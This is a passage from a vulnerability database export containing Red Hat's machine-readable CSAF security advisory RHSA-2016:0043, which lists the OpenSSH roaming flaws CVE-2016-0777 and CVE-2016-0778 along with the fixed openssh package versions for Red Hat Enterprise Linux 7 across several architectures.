buffer overflow", "sources": [ { "db": "CERT/CC", "id": "VU#456088" } ], "trust": 0.8 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "buffer error", "sources": [ { "db": "CNNVD", "id": "CNNVD-201601-250" } ], "trust": 0.6 } }
rhsa-2016_0043
Vulnerability from csaf_redhat
Notes
{ "document": { "aggregate_severity": { "namespace": "https://access.redhat.com/security/updates/classification/", "text": "Moderate" }, "category": "csaf_security_advisory", "csaf_version": "2.0", "distribution": { "text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.", "tlp": { "label": "WHITE", "url": "https://www.first.org/tlp/" } }, "lang": "en", "notes": [ { "category": "summary", "text": "Updated openssh packages that fix two security issues are now available for\nRed Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having Moderate security\nimpact. Common Vulnerability Scoring System (CVSS) base scores, which give\ndetailed severity ratings, are available for each vulnerability from the\nCVE links in the References section.", "title": "Topic" }, { "category": "general", "text": "OpenSSH is OpenBSD\u0027s SSH (Secure Shell) protocol implementation.\nThese packages include the core files necessary for both the OpenSSH client\nand server.\n\nAn information leak flaw was found in the way the OpenSSH client roaming\nfeature was implemented. A malicious server could potentially use this flaw\nto leak portions of memory (possibly including private SSH keys) of a\nsuccessfully authenticated OpenSSH client. (CVE-2016-0777)\n\nA buffer overflow flaw was found in the way the OpenSSH client roaming\nfeature was implemented. A malicious server could potentially use this flaw\nto execute arbitrary code on a successfully authenticated OpenSSH client if\nthat client used certain non-default configuration options. (CVE-2016-0778)\n\nRed Hat would like to thank Qualys for reporting these issues.\n\nAll openssh users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues. After installing this\nupdate, the OpenSSH server daemon (sshd) will be restarted automatically.", "title": "Details" }, { "category": "legal_disclaimer", "text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.", "title": "Terms of Use" } ], "publisher": { "category": "vendor", "contact_details": "https://access.redhat.com/security/team/contact/", "issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.", "name": "Red Hat Product Security", "namespace": "https://www.redhat.com" }, "references": [ { "category": "self", "summary": "https://access.redhat.com/errata/RHSA-2016:0043", "url": "https://access.redhat.com/errata/RHSA-2016:0043" }, { "category": "external", "summary": "https://access.redhat.com/security/updates/classification/#moderate", "url": "https://access.redhat.com/security/updates/classification/#moderate" }, { "category": "external", "summary": "https://access.redhat.com/articles/2123781", "url": "https://access.redhat.com/articles/2123781" }, { "category": "external", "summary": "1298032", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1298032" }, { "category": "external", "summary": "1298033", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1298033" }, { "category": "self", "summary": "Canonical URL", "url": "https://security.access.redhat.com/data/csaf/v2/advisories/2016/rhsa-2016_0043.json" } ], "title": "Red Hat Security Advisory: openssh security update", "tracking": { "current_release_date": "2024-11-22T09:45:54+00:00", "generator": { "date": "2024-11-22T09:45:54+00:00", "engine": { "name": "Red Hat SDEngine", "version": "4.2.1" } }, "id": "RHSA-2016:0043", "initial_release_date": "2016-01-14T20:20:12+00:00", "revision_history": [ { "date": "2016-01-14T20:20:12+00:00", "number": "1", "summary": "Initial version" }, { "date": "2016-01-14T20:20:12+00:00", "number": "2", "summary": "Last updated version" }, { "date": "2024-11-22T09:45:54+00:00", "number": "3", "summary": "Last generated version" } ], "status": "final", "version": "3" } }, "product_tree": { "branches": [ { "branches": [ { "branches": [ { "category": "product_name", "name": "Red Hat Enterprise Linux Client (v. 7)", "product": { "name": "Red Hat Enterprise Linux Client (v. 7)", "product_id": "7Client-7.2.Z", "product_identification_helper": { "cpe": "cpe:/o:redhat:enterprise_linux:7::client" } } }, { "category": "product_name", "name": "Red Hat Enterprise Linux Client Optional (v. 7)", "product": { "name": "Red Hat Enterprise Linux Client Optional (v. 7)", "product_id": "7Client-optional-7.2.Z", "product_identification_helper": { "cpe": "cpe:/o:redhat:enterprise_linux:7::client" } } }, { "category": "product_name", "name": "Red Hat Enterprise Linux ComputeNode (v. 7)", "product": { "name": "Red Hat Enterprise Linux ComputeNode (v. 7)", "product_id": "7ComputeNode-7.2.Z", "product_identification_helper": { "cpe": "cpe:/o:redhat:enterprise_linux:7::computenode" } } }, { "category": "product_name", "name": "Red Hat Enterprise Linux ComputeNode Optional (v. 7)", "product": { "name": "Red Hat Enterprise Linux ComputeNode Optional (v. 7)", "product_id": "7ComputeNode-optional-7.2.Z", "product_identification_helper": { "cpe": "cpe:/o:redhat:enterprise_linux:7::computenode" } } }, { "category": "product_name", "name": "Red Hat Enterprise Linux Server (v. 7)", "product": { "name": "Red Hat Enterprise Linux Server (v. 7)", "product_id": "7Server-7.2.Z", "product_identification_helper": { "cpe": "cpe:/o:redhat:enterprise_linux:7::server" } } }, { "category": "product_name", "name": "Red Hat Enterprise Linux Server Optional (v. 7)", "product": { "name": "Red Hat Enterprise Linux Server Optional (v. 7)", "product_id": "7Server-optional-7.2.Z", "product_identification_helper": { "cpe": "cpe:/o:redhat:enterprise_linux:7::server" } } }, { "category": "product_name", "name": "Red Hat Enterprise Linux Workstation (v. 7)", "product": { "name": "Red Hat Enterprise Linux Workstation (v. 7)", "product_id": "7Workstation-7.2.Z", "product_identification_helper": { "cpe": "cpe:/o:redhat:enterprise_linux:7::workstation" } } }, { "category": "product_name", "name": "Red Hat Enterprise Linux Workstation Optional (v. 7)", "product": { "name": "Red Hat Enterprise Linux Workstation Optional (v. 7)", "product_id": "7Workstation-optional-7.2.Z", "product_identification_helper": { "cpe": "cpe:/o:redhat:enterprise_linux:7::workstation" } } } ], "category": "product_family", "name": "Red Hat Enterprise Linux" }, { "branches": [ { "category": "product_version", "name": "openssh-debuginfo-0:6.6.1p1-23.el7_2.i686", "product": { "name": "openssh-debuginfo-0:6.6.1p1-23.el7_2.i686", "product_id": "openssh-debuginfo-0:6.6.1p1-23.el7_2.i686", "product_identification_helper": { "purl": "pkg:rpm/redhat/openssh-debuginfo@6.6.1p1-23.el7_2?arch=i686" } } }, { "category": "product_version", "name": "pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.i686", "product": { "name": "pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.i686", "product_id": "pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.i686", "product_identification_helper": { "purl": "pkg:rpm/redhat/pam_ssh_agent_auth@0.9.3-9.23.el7_2?arch=i686" } } } ], "category": "architecture", "name": "i686" }, { "branches": [ { "category": "product_version", "name": "openssh-askpass-0:6.6.1p1-23.el7_2.x86_64", "product": { "name": "openssh-askpass-0:6.6.1p1-23.el7_2.x86_64", "product_id": "openssh-askpass-0:6.6.1p1-23.el7_2.x86_64", "product_identification_helper": { "purl": "pkg:rpm/redhat/openssh-askpass@6.6.1p1-23.el7_2?arch=x86_64" } } }, { "category": "product_version", "name": "openssh-server-sysvinit-0:6.6.1p1-23.el7_2.x86_64", "product": { "name": "openssh-server-sysvinit-0:6.6.1p1-23.el7_2.x86_64", "product_id": "openssh-server-sysvinit-0:6.6.1p1-23.el7_2.x86_64", "product_identification_helper": { "purl": "pkg:rpm/redhat/openssh-server-sysvinit@6.6.1p1-23.el7_2?arch=x86_64" } } }, { "category": "product_version", "name": "openssh-debuginfo-0:6.6.1p1-23.el7_2.x86_64", "product": { "name": "openssh-debuginfo-0:6.6.1p1-23.el7_2.x86_64", "product_id": "openssh-debuginfo-0:6.6.1p1-23.el7_2.x86_64", "product_identification_helper": { "purl": "pkg:rpm/redhat/openssh-debuginfo@6.6.1p1-23.el7_2?arch=x86_64" } } }, { "category": "product_version", "name": "pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.x86_64", "product": { "name": "pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.x86_64", "product_id": "pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.x86_64", "product_identification_helper": { "purl": "pkg:rpm/redhat/pam_ssh_agent_auth@0.9.3-9.23.el7_2?arch=x86_64" } } }, { "category": "product_version", "name": "openssh-ldap-0:6.6.1p1-23.el7_2.x86_64", "product": { "name": "openssh-ldap-0:6.6.1p1-23.el7_2.x86_64", "product_id": "openssh-ldap-0:6.6.1p1-23.el7_2.x86_64", "product_identification_helper": { "purl": "pkg:rpm/redhat/openssh-ldap@6.6.1p1-23.el7_2?arch=x86_64" } } }, { "category": "product_version", "name": "openssh-clients-0:6.6.1p1-23.el7_2.x86_64", "product": { "name": "openssh-clients-0:6.6.1p1-23.el7_2.x86_64", "product_id": "openssh-clients-0:6.6.1p1-23.el7_2.x86_64", "product_identification_helper": { "purl": "pkg:rpm/redhat/openssh-clients@6.6.1p1-23.el7_2?arch=x86_64" } } }, { "category": "product_version", "name": "openssh-keycat-0:6.6.1p1-23.el7_2.x86_64", "product": { "name": "openssh-keycat-0:6.6.1p1-23.el7_2.x86_64", "product_id": "openssh-keycat-0:6.6.1p1-23.el7_2.x86_64", "product_identification_helper": { "purl": "pkg:rpm/redhat/openssh-keycat@6.6.1p1-23.el7_2?arch=x86_64" } } }, { "category": "product_version", "name": "openssh-0:6.6.1p1-23.el7_2.x86_64", "product": { "name": "openssh-0:6.6.1p1-23.el7_2.x86_64", "product_id": "openssh-0:6.6.1p1-23.el7_2.x86_64", "product_identification_helper": { "purl": "pkg:rpm/redhat/openssh@6.6.1p1-23.el7_2?arch=x86_64" } } }, { "category": "product_version", "name": "openssh-server-0:6.6.1p1-23.el7_2.x86_64", "product": { "name": "openssh-server-0:6.6.1p1-23.el7_2.x86_64", "product_id": "openssh-server-0:6.6.1p1-23.el7_2.x86_64", "product_identification_helper": { "purl": "pkg:rpm/redhat/openssh-server@6.6.1p1-23.el7_2?arch=x86_64" } } } ], "category": "architecture", "name": "x86_64" }, { "branches": [ { "category": "product_version", "name": "openssh-0:6.6.1p1-23.el7_2.src", "product": { "name": "openssh-0:6.6.1p1-23.el7_2.src", "product_id": "openssh-0:6.6.1p1-23.el7_2.src", "product_identification_helper": { "purl": "pkg:rpm/redhat/openssh@6.6.1p1-23.el7_2?arch=src" } } } ], "category": "architecture", "name": "src" }, { "branches": [ { "category": "product_version", "name": "openssh-ldap-0:6.6.1p1-23.el7_2.ppc64", "product": { "name": "openssh-ldap-0:6.6.1p1-23.el7_2.ppc64", "product_id": "openssh-ldap-0:6.6.1p1-23.el7_2.ppc64", "product_identification_helper": { "purl": "pkg:rpm/redhat/openssh-ldap@6.6.1p1-23.el7_2?arch=ppc64" } } }, { "category": "product_version", "name": "openssh-server-sysvinit-0:6.6.1p1-23.el7_2.ppc64", "product": { "name": "openssh-server-sysvinit-0:6.6.1p1-23.el7_2.ppc64", "product_id": "openssh-server-sysvinit-0:6.6.1p1-23.el7_2.ppc64", "product_identification_helper": { "purl": "pkg:rpm/redhat/openssh-server-sysvinit@6.6.1p1-23.el7_2?arch=ppc64" } } }, { "category": "product_version", "name": "pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc64", "product": { "name": "pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc64", "product_id": "pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc64", "product_identification_helper": { "purl": "pkg:rpm/redhat/pam_ssh_agent_auth@0.9.3-9.23.el7_2?arch=ppc64" } } }, { "category": "product_version", "name": "openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc64", "product": { "name": "openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc64", "product_id": "openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc64", "product_identification_helper": { "purl": "pkg:rpm/redhat/openssh-debuginfo@6.6.1p1-23.el7_2?arch=ppc64" } } }, { "category": "product_version", "name": "openssh-server-0:6.6.1p1-23.el7_2.ppc64", "product": { "name": "openssh-server-0:6.6.1p1-23.el7_2.ppc64", "product_id": "openssh-server-0:6.6.1p1-23.el7_2.ppc64", "product_identification_helper": { "purl": "pkg:rpm/redhat/openssh-server@6.6.1p1-23.el7_2?arch=ppc64" } } }, { "category": "product_version", "name": "openssh-clients-0:6.6.1p1-23.el7_2.ppc64", "product": { "name": "openssh-clients-0:6.6.1p1-23.el7_2.ppc64", "product_id": "openssh-clients-0:6.6.1p1-23.el7_2.ppc64", "product_identification_helper": { "purl": "pkg:rpm/redhat/openssh-clients@6.6.1p1-23.el7_2?arch=ppc64" } } }, { "category": "product_version", "name": "openssh-0:6.6.1p1-23.el7_2.ppc64", "product": { "name": "openssh-0:6.6.1p1-23.el7_2.ppc64", "product_id": "openssh-0:6.6.1p1-23.el7_2.ppc64", "product_identification_helper": { "purl": "pkg:rpm/redhat/openssh@6.6.1p1-23.el7_2?arch=ppc64" } } }, { "category": "product_version", "name": "openssh-askpass-0:6.6.1p1-23.el7_2.ppc64", "product": { "name": "openssh-askpass-0:6.6.1p1-23.el7_2.ppc64", "product_id": "openssh-askpass-0:6.6.1p1-23.el7_2.ppc64", "product_identification_helper": { "purl": "pkg:rpm/redhat/openssh-askpass@6.6.1p1-23.el7_2?arch=ppc64" } } }, { "category": "product_version", "name": "openssh-keycat-0:6.6.1p1-23.el7_2.ppc64", "product": { "name": "openssh-keycat-0:6.6.1p1-23.el7_2.ppc64", "product_id": "openssh-keycat-0:6.6.1p1-23.el7_2.ppc64", "product_identification_helper": { "purl": "pkg:rpm/redhat/openssh-keycat@6.6.1p1-23.el7_2?arch=ppc64" } } } ], "category": "architecture", "name": "ppc64" }, { "branches": [ { "category": "product_version", "name": "pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc", "product": { "name": "pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc", "product_id": "pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc", "product_identification_helper": { "purl": "pkg:rpm/redhat/pam_ssh_agent_auth@0.9.3-9.23.el7_2?arch=ppc" } } }, { "category": "product_version", "name": "openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc", "product": { "name": "openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc", "product_id": "openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc", "product_identification_helper": { "purl": "pkg:rpm/redhat/openssh-debuginfo@6.6.1p1-23.el7_2?arch=ppc" } } } ], "category": "architecture", "name": "ppc" }, { "branches": [ { "category": "product_version", "name": "pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc64le", "product": { "name": "pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc64le", "product_id": "pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc64le", "product_identification_helper": { "purl": "pkg:rpm/redhat/pam_ssh_agent_auth@0.9.3-9.23.el7_2?arch=ppc64le" } } }, { "category": "product_version", "name": "openssh-ldap-0:6.6.1p1-23.el7_2.ppc64le", "product": { "name": "openssh-ldap-0:6.6.1p1-23.el7_2.ppc64le", "product_id": "openssh-ldap-0:6.6.1p1-23.el7_2.ppc64le", "product_identification_helper": { "purl": "pkg:rpm/redhat/openssh-ldap@6.6.1p1-23.el7_2?arch=ppc64le" } } }, { "category": "product_version", "name": "openssh-server-sysvinit-0:6.6.1p1-23.el7_2.ppc64le", "product": { "name": "openssh-server-sysvinit-0:6.6.1p1-23.el7_2.ppc64le", "product_id": "openssh-server-sysvinit-0:6.6.1p1-23.el7_2.ppc64le", "product_identification_helper": { "purl": "pkg:rpm/redhat/openssh-server-sysvinit@6.6.1p1-23.el7_2?arch=ppc64le" } } }, { "category": "product_version", "name": "openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc64le", "product": { "name": "openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc64le", "product_id": "openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc64le", "product_identification_helper": { "purl": "pkg:rpm/redhat/openssh-debuginfo@6.6.1p1-23.el7_2?arch=ppc64le" } } }, { "category": "product_version", "name": "openssh-server-0:6.6.1p1-23.el7_2.ppc64le", "product": { "name": "openssh-server-0:6.6.1p1-23.el7_2.ppc64le", "product_id": "openssh-server-0:6.6.1p1-23.el7_2.ppc64le", "product_identification_helper": { "purl": "pkg:rpm/redhat/openssh-server@6.6.1p1-23.el7_2?arch=ppc64le" } } }, { "category": "product_version", "name": "openssh-clients-0:6.6.1p1-23.el7_2.ppc64le", "product": { "name": "openssh-clients-0:6.6.1p1-23.el7_2.ppc64le", "product_id": "openssh-clients-0:6.6.1p1-23.el7_2.ppc64le", "product_identification_helper": { "purl": "pkg:rpm/redhat/openssh-clients@6.6.1p1-23.el7_2?arch=ppc64le" } } }, { "category": "product_version", "name": "openssh-askpass-0:6.6.1p1-23.el7_2.ppc64le", "product": { "name": "openssh-askpass-0:6.6.1p1-23.el7_2.ppc64le", "product_id": "openssh-askpass-0:6.6.1p1-23.el7_2.ppc64le", "product_identification_helper": { "purl": "pkg:rpm/redhat/openssh-askpass@6.6.1p1-23.el7_2?arch=ppc64le" } } }, { "category": "product_version", "name": "openssh-0:6.6.1p1-23.el7_2.ppc64le", "product": { "name": "openssh-0:6.6.1p1-23.el7_2.ppc64le", "product_id": "openssh-0:6.6.1p1-23.el7_2.ppc64le", "product_identification_helper": { "purl": "pkg:rpm/redhat/openssh@6.6.1p1-23.el7_2?arch=ppc64le" } } }, { "category": "product_version", "name": "openssh-keycat-0:6.6.1p1-23.el7_2.ppc64le", "product": { "name": "openssh-keycat-0:6.6.1p1-23.el7_2.ppc64le", "product_id": "openssh-keycat-0:6.6.1p1-23.el7_2.ppc64le", "product_identification_helper": { "purl": "pkg:rpm/redhat/openssh-keycat@6.6.1p1-23.el7_2?arch=ppc64le" } } } ], "category": "architecture", "name": "ppc64le" }, { "branches": [ { "category": "product_version", "name": "pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.s390", "product": { "name": "pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.s390", "product_id": "pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.s390", "product_identification_helper": { "purl": "pkg:rpm/redhat/pam_ssh_agent_auth@0.9.3-9.23.el7_2?arch=s390" } } }, { "category": "product_version", "name": "openssh-debuginfo-0:6.6.1p1-23.el7_2.s390", "product": { "name": "openssh-debuginfo-0:6.6.1p1-23.el7_2.s390", "product_id": "openssh-debuginfo-0:6.6.1p1-23.el7_2.s390", "product_identification_helper": { "purl": "pkg:rpm/redhat/openssh-debuginfo@6.6.1p1-23.el7_2?arch=s390" } } } ], "category": "architecture", "name": "s390" }, { "branches": [ { "category": "product_version", "name": "openssh-ldap-0:6.6.1p1-23.el7_2.s390x", "product": { "name": "openssh-ldap-0:6.6.1p1-23.el7_2.s390x", "product_id": "openssh-ldap-0:6.6.1p1-23.el7_2.s390x", "product_identification_helper": { "purl": "pkg:rpm/redhat/openssh-ldap@6.6.1p1-23.el7_2?arch=s390x" } } }, { "category": "product_version", "name": "openssh-server-sysvinit-0:6.6.1p1-23.el7_2.s390x", "product": { "name": "openssh-server-sysvinit-0:6.6.1p1-23.el7_2.s390x", "product_id": "openssh-server-sysvinit-0:6.6.1p1-23.el7_2.s390x", "product_identification_helper": { "purl": "pkg:rpm/redhat/openssh-server-sysvinit@6.6.1p1-23.el7_2?arch=s390x" } } }, { "category": "product_version", "name": "pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.s390x", "product": { "name": "pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.s390x", "product_id": "pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.s390x", "product_identification_helper": { "purl": "pkg:rpm/redhat/pam_ssh_agent_auth@0.9.3-9.23.el7_2?arch=s390x" } } }, { "category": "product_version", "name": "openssh-debuginfo-0:6.6.1p1-23.el7_2.s390x", "product": { "name": "openssh-debuginfo-0:6.6.1p1-23.el7_2.s390x", "product_id": "openssh-debuginfo-0:6.6.1p1-23.el7_2.s390x", "product_identification_helper": { "purl": "pkg:rpm/redhat/openssh-debuginfo@6.6.1p1-23.el7_2?arch=s390x" } } }, { "category": "product_version", "name": "openssh-server-0:6.6.1p1-23.el7_2.s390x", "product": { "name": "openssh-server-0:6.6.1p1-23.el7_2.s390x", "product_id": "openssh-server-0:6.6.1p1-23.el7_2.s390x", "product_identification_helper": { "purl": "pkg:rpm/redhat/openssh-server@6.6.1p1-23.el7_2?arch=s390x" } } }, { "category": "product_version", "name": "openssh-keycat-0:6.6.1p1-23.el7_2.s390x", "product": { "name": "openssh-keycat-0:6.6.1p1-23.el7_2.s390x", "product_id": "openssh-keycat-0:6.6.1p1-23.el7_2.s390x", "product_identification_helper": { "purl": "pkg:rpm/redhat/openssh-keycat@6.6.1p1-23.el7_2?arch=s390x" } } }, { "category": "product_version", "name": "openssh-clients-0:6.6.1p1-23.el7_2.s390x", "product": { "name": "openssh-clients-0:6.6.1p1-23.el7_2.s390x", "product_id": "openssh-clients-0:6.6.1p1-23.el7_2.s390x", "product_identification_helper": { "purl": "pkg:rpm/redhat/openssh-clients@6.6.1p1-23.el7_2?arch=s390x" } } }, { "category": "product_version", "name": "openssh-0:6.6.1p1-23.el7_2.s390x", "product": { "name": "openssh-0:6.6.1p1-23.el7_2.s390x", "product_id": "openssh-0:6.6.1p1-23.el7_2.s390x", "product_identification_helper": { "purl": "pkg:rpm/redhat/openssh@6.6.1p1-23.el7_2?arch=s390x" } } }, { "category": "product_version", "name": "openssh-askpass-0:6.6.1p1-23.el7_2.s390x", "product": { "name": "openssh-askpass-0:6.6.1p1-23.el7_2.s390x", "product_id": "openssh-askpass-0:6.6.1p1-23.el7_2.s390x", "product_identification_helper": { "purl": "pkg:rpm/redhat/openssh-askpass@6.6.1p1-23.el7_2?arch=s390x" } } } ], "category": "architecture", "name": "s390x" } ], "category": "vendor", "name": "Red Hat" } ], "relationships": [ { "category": "default_component_of", "full_product_name": { "name": "openssh-0:6.6.1p1-23.el7_2.ppc64 as a component of Red Hat Enterprise Linux Client (v. 7)", "product_id": "7Client-7.2.Z:openssh-0:6.6.1p1-23.el7_2.ppc64" }, "product_reference": "openssh-0:6.6.1p1-23.el7_2.ppc64", "relates_to_product_reference": "7Client-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-0:6.6.1p1-23.el7_2.ppc64le as a component of Red Hat Enterprise Linux Client (v. 7)", "product_id": "7Client-7.2.Z:openssh-0:6.6.1p1-23.el7_2.ppc64le" }, "product_reference": "openssh-0:6.6.1p1-23.el7_2.ppc64le", "relates_to_product_reference": "7Client-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-0:6.6.1p1-23.el7_2.s390x as a component of Red Hat Enterprise Linux Client (v. 7)", "product_id": "7Client-7.2.Z:openssh-0:6.6.1p1-23.el7_2.s390x" }, "product_reference": "openssh-0:6.6.1p1-23.el7_2.s390x", "relates_to_product_reference": "7Client-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-0:6.6.1p1-23.el7_2.src as a component of Red Hat Enterprise Linux Client (v. 7)", "product_id": "7Client-7.2.Z:openssh-0:6.6.1p1-23.el7_2.src" }, "product_reference": "openssh-0:6.6.1p1-23.el7_2.src", "relates_to_product_reference": "7Client-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-0:6.6.1p1-23.el7_2.x86_64 as a component of Red Hat Enterprise Linux Client (v. 7)", "product_id": "7Client-7.2.Z:openssh-0:6.6.1p1-23.el7_2.x86_64" }, "product_reference": "openssh-0:6.6.1p1-23.el7_2.x86_64", "relates_to_product_reference": "7Client-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-askpass-0:6.6.1p1-23.el7_2.ppc64 as a component of Red Hat Enterprise Linux Client (v. 7)", "product_id": "7Client-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.ppc64" }, "product_reference": "openssh-askpass-0:6.6.1p1-23.el7_2.ppc64", "relates_to_product_reference": "7Client-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-askpass-0:6.6.1p1-23.el7_2.ppc64le as a component of Red Hat Enterprise Linux Client (v. 7)", "product_id": "7Client-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.ppc64le" }, "product_reference": "openssh-askpass-0:6.6.1p1-23.el7_2.ppc64le", "relates_to_product_reference": "7Client-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-askpass-0:6.6.1p1-23.el7_2.s390x as a component of Red Hat Enterprise Linux Client (v. 7)", "product_id": "7Client-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.s390x" }, "product_reference": "openssh-askpass-0:6.6.1p1-23.el7_2.s390x", "relates_to_product_reference": "7Client-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-askpass-0:6.6.1p1-23.el7_2.x86_64 as a component of Red Hat Enterprise Linux Client (v. 7)", "product_id": "7Client-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.x86_64" }, "product_reference": "openssh-askpass-0:6.6.1p1-23.el7_2.x86_64", "relates_to_product_reference": "7Client-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-clients-0:6.6.1p1-23.el7_2.ppc64 as a component of Red Hat Enterprise Linux Client (v. 7)", "product_id": "7Client-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.ppc64" }, "product_reference": "openssh-clients-0:6.6.1p1-23.el7_2.ppc64", "relates_to_product_reference": "7Client-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-clients-0:6.6.1p1-23.el7_2.ppc64le as a component of Red Hat Enterprise Linux Client (v. 7)", "product_id": "7Client-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.ppc64le" }, "product_reference": "openssh-clients-0:6.6.1p1-23.el7_2.ppc64le", "relates_to_product_reference": "7Client-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-clients-0:6.6.1p1-23.el7_2.s390x as a component of Red Hat Enterprise Linux Client (v. 7)", "product_id": "7Client-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.s390x" }, "product_reference": "openssh-clients-0:6.6.1p1-23.el7_2.s390x", "relates_to_product_reference": "7Client-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-clients-0:6.6.1p1-23.el7_2.x86_64 as a component of Red Hat Enterprise Linux Client (v. 7)", "product_id": "7Client-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.x86_64" }, "product_reference": "openssh-clients-0:6.6.1p1-23.el7_2.x86_64", "relates_to_product_reference": "7Client-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-debuginfo-0:6.6.1p1-23.el7_2.i686 as a component of Red Hat Enterprise Linux Client (v. 7)", "product_id": "7Client-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.i686" }, "product_reference": "openssh-debuginfo-0:6.6.1p1-23.el7_2.i686", "relates_to_product_reference": "7Client-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc as a component of Red Hat Enterprise Linux Client (v. 7)", "product_id": "7Client-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc" }, "product_reference": "openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc", "relates_to_product_reference": "7Client-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc64 as a component of Red Hat Enterprise Linux Client (v. 7)", "product_id": "7Client-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc64" }, "product_reference": "openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc64", "relates_to_product_reference": "7Client-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc64le as a component of Red Hat Enterprise Linux Client (v. 7)", "product_id": "7Client-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc64le" }, "product_reference": "openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc64le", "relates_to_product_reference": "7Client-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-debuginfo-0:6.6.1p1-23.el7_2.s390 as a component of Red Hat Enterprise Linux Client (v. 7)", "product_id": "7Client-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.s390" }, "product_reference": "openssh-debuginfo-0:6.6.1p1-23.el7_2.s390", "relates_to_product_reference": "7Client-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-debuginfo-0:6.6.1p1-23.el7_2.s390x as a component of Red Hat Enterprise Linux Client (v. 7)", "product_id": "7Client-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.s390x" }, "product_reference": "openssh-debuginfo-0:6.6.1p1-23.el7_2.s390x", "relates_to_product_reference": "7Client-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-debuginfo-0:6.6.1p1-23.el7_2.x86_64 as a component of Red Hat Enterprise Linux Client (v. 7)", "product_id": "7Client-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.x86_64" }, "product_reference": "openssh-debuginfo-0:6.6.1p1-23.el7_2.x86_64", "relates_to_product_reference": "7Client-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-keycat-0:6.6.1p1-23.el7_2.ppc64 as a component of Red Hat Enterprise Linux Client (v. 7)", "product_id": "7Client-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.ppc64" }, "product_reference": "openssh-keycat-0:6.6.1p1-23.el7_2.ppc64", "relates_to_product_reference": "7Client-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-keycat-0:6.6.1p1-23.el7_2.ppc64le as a component of Red Hat Enterprise Linux Client (v. 7)", "product_id": 